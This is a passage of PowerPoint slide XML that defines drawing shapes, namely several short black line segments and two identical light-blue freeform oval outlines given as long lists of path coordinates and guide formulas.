                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10660" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1791" y="2595"/>
                <a:ext cx="58" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10661" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1902" y="2639"/>
                <a:ext cx="51" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10662" name="Line 69"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1845" y="2595"/>
                <a:ext cx="59" cy="44"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10663" name="Line 70"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1791" y="2638"/>
                <a:ext cx="58" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10664" name="Line 71"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1902" y="2594"/>
                <a:ext cx="51" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10665" name="Line 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1845" y="2594"/>
                <a:ext cx="59" cy="44"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10666" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="2737"/>
                <a:ext cx="403" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 181 w 403"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 142 w 403"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 106 w 403"/>
                  <a:gd name="T5" fmla="*/ 5 h 77"/>
                  <a:gd name="T6" fmla="*/ 81 w 403"/>
                  <a:gd name="T7" fmla="*/ 7 h 77"/>
                  <a:gd name="T8" fmla="*/ 66 w 403"/>
                  <a:gd name="T9" fmla="*/ 10 h 77"/>
                  <a:gd name="T10" fmla="*/ 52 w 403"/>
                  <a:gd name="T11" fmla="*/ 13 h 77"/>
                  <a:gd name="T12" fmla="*/ 40 w 403"/>
                  <a:gd name="T13" fmla="*/ 15 h 77"/>
                  <a:gd name="T14" fmla="*/ 29 w 403"/>
                  <a:gd name="T15" fmla="*/ 19 h 77"/>
                  <a:gd name="T16" fmla="*/ 19 w 403"/>
                  <a:gd name="T17" fmla="*/ 22 h 77"/>
                  <a:gd name="T18" fmla="*/ 12 w 403"/>
                  <a:gd name="T19" fmla="*/ 26 h 77"/>
                  <a:gd name="T20" fmla="*/ 7 w 403"/>
                  <a:gd name="T21" fmla="*/ 29 h 77"/>
                  <a:gd name="T22" fmla="*/ 2 w 403"/>
                  <a:gd name="T23" fmla="*/ 33 h 77"/>
                  <a:gd name="T24" fmla="*/ 0 w 403"/>
                  <a:gd name="T25" fmla="*/ 36 h 77"/>
                  <a:gd name="T26" fmla="*/ 0 w 403"/>
                  <a:gd name="T27" fmla="*/ 41 h 77"/>
                  <a:gd name="T28" fmla="*/ 2 w 403"/>
                  <a:gd name="T29" fmla="*/ 45 h 77"/>
                  <a:gd name="T30" fmla="*/ 7 w 403"/>
                  <a:gd name="T31" fmla="*/ 48 h 77"/>
                  <a:gd name="T32" fmla="*/ 12 w 403"/>
                  <a:gd name="T33" fmla="*/ 52 h 77"/>
                  <a:gd name="T34" fmla="*/ 19 w 403"/>
                  <a:gd name="T35" fmla="*/ 55 h 77"/>
                  <a:gd name="T36" fmla="*/ 29 w 403"/>
                  <a:gd name="T37" fmla="*/ 59 h 77"/>
                  <a:gd name="T38" fmla="*/ 40 w 403"/>
                  <a:gd name="T39" fmla="*/ 62 h 77"/>
                  <a:gd name="T40" fmla="*/ 52 w 403"/>
                  <a:gd name="T41" fmla="*/ 65 h 77"/>
                  <a:gd name="T42" fmla="*/ 66 w 403"/>
                  <a:gd name="T43" fmla="*/ 68 h 77"/>
                  <a:gd name="T44" fmla="*/ 81 w 403"/>
                  <a:gd name="T45" fmla="*/ 70 h 77"/>
                  <a:gd name="T46" fmla="*/ 106 w 403"/>
                  <a:gd name="T47" fmla="*/ 73 h 77"/>
                  <a:gd name="T48" fmla="*/ 142 w 403"/>
                  <a:gd name="T49" fmla="*/ 76 h 77"/>
                  <a:gd name="T50" fmla="*/ 181 w 403"/>
                  <a:gd name="T51" fmla="*/ 77 h 77"/>
                  <a:gd name="T52" fmla="*/ 223 w 403"/>
                  <a:gd name="T53" fmla="*/ 77 h 77"/>
                  <a:gd name="T54" fmla="*/ 261 w 403"/>
                  <a:gd name="T55" fmla="*/ 76 h 77"/>
                  <a:gd name="T56" fmla="*/ 297 w 403"/>
                  <a:gd name="T57" fmla="*/ 73 h 77"/>
                  <a:gd name="T58" fmla="*/ 322 w 403"/>
                  <a:gd name="T59" fmla="*/ 70 h 77"/>
                  <a:gd name="T60" fmla="*/ 337 w 403"/>
                  <a:gd name="T61" fmla="*/ 68 h 77"/>
                  <a:gd name="T62" fmla="*/ 351 w 403"/>
                  <a:gd name="T63" fmla="*/ 65 h 77"/>
                  <a:gd name="T64" fmla="*/ 363 w 403"/>
                  <a:gd name="T65" fmla="*/ 62 h 77"/>
                  <a:gd name="T66" fmla="*/ 374 w 403"/>
                  <a:gd name="T67" fmla="*/ 59 h 77"/>
                  <a:gd name="T68" fmla="*/ 384 w 403"/>
                  <a:gd name="T69" fmla="*/ 55 h 77"/>
                  <a:gd name="T70" fmla="*/ 391 w 403"/>
                  <a:gd name="T71" fmla="*/ 52 h 77"/>
                  <a:gd name="T72" fmla="*/ 396 w 403"/>
                  <a:gd name="T73" fmla="*/ 48 h 77"/>
                  <a:gd name="T74" fmla="*/ 401 w 403"/>
                  <a:gd name="T75" fmla="*/ 45 h 77"/>
                  <a:gd name="T76" fmla="*/ 402 w 403"/>
                  <a:gd name="T77" fmla="*/ 41 h 77"/>
                  <a:gd name="T78" fmla="*/ 402 w 403"/>
                  <a:gd name="T79" fmla="*/ 36 h 77"/>
                  <a:gd name="T80" fmla="*/ 401 w 403"/>
                  <a:gd name="T81" fmla="*/ 33 h 77"/>
                  <a:gd name="T82" fmla="*/ 396 w 403"/>
                  <a:gd name="T83" fmla="*/ 29 h 77"/>
                  <a:gd name="T84" fmla="*/ 391 w 403"/>
                  <a:gd name="T85" fmla="*/ 26 h 77"/>
                  <a:gd name="T86" fmla="*/ 384 w 403"/>
                  <a:gd name="T87" fmla="*/ 22 h 77"/>
                  <a:gd name="T88" fmla="*/ 374 w 403"/>
                  <a:gd name="T89" fmla="*/ 19 h 77"/>
                  <a:gd name="T90" fmla="*/ 363 w 403"/>
                  <a:gd name="T91" fmla="*/ 15 h 77"/>
                  <a:gd name="T92" fmla="*/ 351 w 403"/>
                  <a:gd name="T93" fmla="*/ 13 h 77"/>
                  <a:gd name="T94" fmla="*/ 337 w 403"/>
                  <a:gd name="T95" fmla="*/ 10 h 77"/>
                  <a:gd name="T96" fmla="*/ 322 w 403"/>
                  <a:gd name="T97" fmla="*/ 7 h 77"/>
                  <a:gd name="T98" fmla="*/ 297 w 403"/>
                  <a:gd name="T99" fmla="*/ 5 h 77"/>
                  <a:gd name="T100" fmla="*/ 261 w 403"/>
                  <a:gd name="T101" fmla="*/ 1 h 77"/>
                  <a:gd name="T102" fmla="*/ 223 w 403"/>
                  <a:gd name="T103" fmla="*/ 0 h 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3"/>
                  <a:gd name="T157" fmla="*/ 0 h 77"/>
                  <a:gd name="T158" fmla="*/ 403 w 403"/>
                  <a:gd name="T159" fmla="*/ 77 h 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3" h="77">
                    <a:moveTo>
                      <a:pt x="202" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="181" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10667" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="2737"/>
                <a:ext cx="403" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 181 w 403"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 142 w 403"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 106 w 403"/>
                  <a:gd name="T5" fmla="*/ 5 h 77"/>
                  <a:gd name="T6" fmla="*/ 81 w 403"/>
                  <a:gd name="T7" fmla="*/ 7 h 77"/>
                  <a:gd name="T8" fmla="*/ 66 w 403"/>
                  <a:gd name="T9" fmla="*/ 10 h 77"/>
                  <a:gd name="T10" fmla="*/ 52 w 403"/>
                  <a:gd name="T11" fmla="*/ 13 h 77"/>
                  <a:gd name="T12" fmla="*/ 40 w 403"/>
                  <a:gd name="T13" fmla="*/ 15 h 77"/>
                  <a:gd name="T14" fmla="*/ 29 w 403"/>
                  <a:gd name="T15" fmla="*/ 19 h 77"/>
                  <a:gd name="T16" fmla="*/ 19 w 403"/>
                  <a:gd name="T17" fmla="*/ 22 h 77"/>
                  <a:gd name="T18" fmla="*/ 12 w 403"/>
                  <a:gd name="T19" fmla="*/ 26 h 77"/>
                  <a:gd name="T20" fmla="*/ 7 w 403"/>
                  <a:gd name="T21" fmla="*/ 29 h 77"/>
                  <a:gd name="T22" fmla="*/ 2 w 403"/>
                  <a:gd name="T23" fmla="*/ 33 h 77"/>
                  <a:gd name="T24" fmla="*/ 0 w 403"/>
                  <a:gd name="T25" fmla="*/ 36 h 77"/>
                  <a:gd name="T26" fmla="*/ 0 w 403"/>
                  <a:gd name="T27" fmla="*/ 41 h 77"/>
                  <a:gd name="T28" fmla="*/ 2 w 403"/>
                  <a:gd name="T29" fmla="*/ 45 h 77"/>
                  <a:gd name="T30" fmla="*/ 7 w 403"/>
                  <a:gd name="T31" fmla="*/ 48 h 77"/>
                  <a:gd name="T32" fmla="*/ 12 w 403"/>
                  <a:gd name="T33" fmla="*/ 52 h 77"/>
                  <a:gd name="T34" fmla="*/ 19 w 403"/>
                  <a:gd name="T35" fmla="*/ 55 h 77"/>
                  <a:gd name="T36" fmla="*/ 29 w 403"/>
                  <a:gd name="T37" fmla="*/ 59 h 77"/>
                  <a:gd name="T38" fmla="*/ 40 w 403"/>
                  <a:gd name="T39" fmla="*/ 62 h 77"/>
                  <a:gd name="T40" fmla="*/ 52 w 403"/>
                  <a:gd name="T41" fmla="*/ 65 h 77"/>
                  <a:gd name="T42" fmla="*/ 66 w 403"/>
                  <a:gd name="T43" fmla="*/ 68 h 77"/>
                  <a:gd name="T44" fmla="*/ 81 w 403"/>
                  <a:gd name="T45" fmla="*/ 70 h 77"/>
                  <a:gd name="T46" fmla="*/ 106 w 403"/>
                  <a:gd name="T47" fmla="*/ 73 h 77"/>
                  <a:gd name="T48" fmla="*/ 142 w 403"/>
                  <a:gd name="T49" fmla="*/ 76 h 77"/>
                  <a:gd name="T50" fmla="*/ 181 w 403"/>
                  <a:gd name="T51" fmla="*/ 77 h 77"/>
                  <a:gd name="T52" fmla="*/ 223 w 403"/>
                  <a:gd name="T53" fmla="*/ 77 h 77"/>
                  <a:gd name="T54" fmla="*/ 261 w 403"/>
                  <a:gd name="T55" fmla="*/ 76 h 77"/>
                  <a:gd name="T56" fmla="*/ 297 w 403"/>
                  <a:gd name="T57" fmla="*/ 73 h 77"/>
                  <a:gd name="T58" fmla="*/ 322 w 403"/>
                  <a:gd name="T59" fmla="*/ 70 h 77"/>
                  <a:gd name="T60" fmla="*/ 337 w 403"/>
                  <a:gd name="T61" fmla="*/ 68 h 77"/>
                  <a:gd name="T62" fmla="*/ 351 w 403"/>
                  <a:gd name="T63" fmla="*/ 65 h 77"/>
                  <a:gd name="T64" fmla="*/ 363 w 403"/>
                  <a:gd name="T65" fmla="*/ 62 h 77"/>
                  <a:gd name="T66" fmla="*/ 374 w 403"/>
                  <a:gd name="T67" fmla="*/ 59 h 77"/>
                  <a:gd name="T68" fmla="*/ 384 w 403"/>
                  <a:gd name="T69" fmla="*/ 55 h 77"/>
                  <a:gd name="T70" fmla="*/ 391 w 403"/>
                  <a:gd name="T71" fmla="*/ 52 h 77"/>
                  <a:gd name="T72" fmla="*/ 396 w 403"/>
                  <a:gd name="T73" fmla="*/ 48 h 77"/>
                  <a:gd name="T74" fmla="*/ 401 w 403"/>
                  <a:gd name="T75" fmla="*/ 45 h 77"/>
                  <a:gd name="T76" fmla="*/ 402 w 403"/>
                  <a:gd name="T77" fmla="*/ 41 h 77"/>
                  <a:gd name="T78" fmla="*/ 402 w 403"/>
                  <a:gd name="T79" fmla="*/ 36 h 77"/>
                  <a:gd name="T80" fmla="*/ 401 w 403"/>
                  <a:gd name="T81" fmla="*/ 33 h 77"/>
                  <a:gd name="T82" fmla="*/ 396 w 403"/>
                  <a:gd name="T83" fmla="*/ 29 h 77"/>
                  <a:gd name="T84" fmla="*/ 391 w 403"/>
                  <a:gd name="T85" fmla="*/ 26 h 77"/>
                  <a:gd name="T86" fmla="*/ 384 w 403"/>
                  <a:gd name="T87" fmla="*/ 22 h 77"/>
                  <a:gd name="T88" fmla="*/ 374 w 403"/>
                  <a:gd name="T89" fmla="*/ 19 h 77"/>
                  <a:gd name="T90" fmla="*/ 363 w 403"/>
                  <a:gd name="T91" fmla="*/ 15 h 77"/>
                  <a:gd name="T92" fmla="*/ 351 w 403"/>
                  <a:gd name="T93" fmla="*/ 13 h 77"/>
                  <a:gd name="T94" fmla="*/ 337 w 403"/>
                  <a:gd name="T95" fmla="*/ 10 h 77"/>
                  <a:gd name="T96" fmla="*/ 322 w 403"/>
                  <a:gd name="T97" fmla="*/ 7 h 77"/>
                  <a:gd name="T98" fmla="*/ 297 w 403"/>
                  <a:gd name="T99" fmla="*/ 5 h 77"/>
                  <a:gd name="T100" fmla="*/ 261 w 403"/>
                  <a:gd name="T101" fmla="*/ 1 h 77"/>
                  <a:gd name="T102" fmla="*/ 223 w 403"/>
                  <a:gd name="T103" fmla="*/ 0 h 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3"/>
                  <a:gd name="T157" fmla="*/ 0 h 77"/>
                  <a:gd name="T158" fmla="*/ 403 w 403"/>
                  <a:gd name="T159" fmla="*/ 77 h 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3" h="77">
                    <a:moveTo>
                      <a:pt x="202" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="181" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
